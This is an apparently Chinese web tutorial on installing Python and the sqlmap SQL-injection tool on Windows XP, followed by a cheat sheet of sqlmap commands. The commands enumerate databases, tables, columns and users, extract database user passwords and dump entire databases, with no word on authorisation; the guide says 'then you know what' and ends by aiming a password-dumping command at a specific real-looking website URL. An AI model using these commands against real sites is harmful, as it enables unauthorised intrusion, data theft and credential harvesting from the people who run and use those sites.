為方便大家使用，腳本之家已經(jīng)為大家封裝了一個(gè)版本，下載地址 http://www.dbjr.com.cn/softs/63591.html
1、首先下載SqlMap 點(diǎn)擊下載。
2、其次下載用于Windows系統(tǒng)的Python ……點(diǎn)擊這里……

3、然后安裝Python：
Python默認(rèn)安裝的路徑是“C:\Python”（你也可以修改安裝路徑，但要記住路徑），直接默認(rèn)安裝“下一步”OK …

4、解壓SqlMap.zip里面的文件…

5、找到你安裝python的目錄（對(duì)于我來(lái)說(shuō)：C:\Python27中）

6、現(xiàn)在，在python文件夾中創(chuàng)建一個(gè)新的文件夾，并命名為“SqlMap”

7、然后把你剛才解壓的SqlMap中的文件全部復(fù)制到C:\Python27\sqlmap文件夾里面

8、最后在桌面空白處右鍵創(chuàng)建一個(gè)新的快捷方式：并命名為“Sqlmap”

9、點(diǎn)擊剛才創(chuàng)建好的Sqlmap快捷方式右鍵—在目標(biāo)欄輸入：%windir%\system32\cmd.exe
如圖：

創(chuàng)建好之后，運(yùn)行你剛才創(chuàng)建的SqlMap快捷方式 這樣就可以在WindowsXP運(yùn)行SqlMap了。

執(zhí)行命令：python sqlmap/sqlmap.py -help


具體的一些命令：

mssql access 直接爆表.然后你懂的
BT5里面的話前面就要加python
sqlmap.py -u url --dbs //爆數(shù)據(jù)庫(kù)
sqlmap.py -u url --current-db //爆當(dāng)前庫(kù)
sqlmap.py -u url --current-user //爆當(dāng)前用戶
sqlmap.py -u url --users 查看用戶權(quán)限
sqlmap.py -u url --tables -D 數(shù)據(jù)庫(kù) //爆表段
sqlmap.py -u url --columns -T 表段 -D 數(shù)據(jù)庫(kù) //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 數(shù)據(jù)庫(kù) //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 數(shù)據(jù)庫(kù) //猜解1到3的字段

翻回來(lái)也可以

sqlmap.py -u url 判斷
sqlmap.py -u url --is-dba -v 這是判斷當(dāng)前數(shù)據(jù)庫(kù)的使用者是否是dba
sqlmap.py -u url --users -v 0 這句的目的是列舉數(shù)據(jù)庫(kù)的用戶
sqlmap.py -u url --passwords -v 0 這句的目的是獲取數(shù)據(jù)庫(kù)用戶的密碼
sqlmap.py -u url --privileges -v 0 這是判斷當(dāng)前的權(quán)限
sqlmap.py -u url --dbs -v 0 這句的目的是將所有的數(shù)據(jù)庫(kù)列出來(lái)
sqlmap.py -u url --tables -D '表' 爆表
sqlmap.py -u url --columns -T ‘表’-D ‘數(shù)據(jù)庫(kù)’爆列
sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 這里是查詢第2到第4行的內(nèi)
sqlmap.py -u url --dump -all -v 0


這兒我們將所有的庫(kù)導(dǎo)出來(lái)，我想這就是前段時(shí)間盛傳的脫褲吧，在執(zhí)行這項(xiàng)操作的時(shí)候，會(huì)把所有的表里的內(nèi)容導(dǎo)入到當(dāng)前的一個(gè)目錄下，看著清楚明了，但是花費(fèi)的時(shí)間和很長(zhǎng)。
sqlmap -u "http://www.newwide.com/newsphp?class=news&id=5&page=1&catalog_id=2" --users --password 爆用戶密碼

最新評(píng)論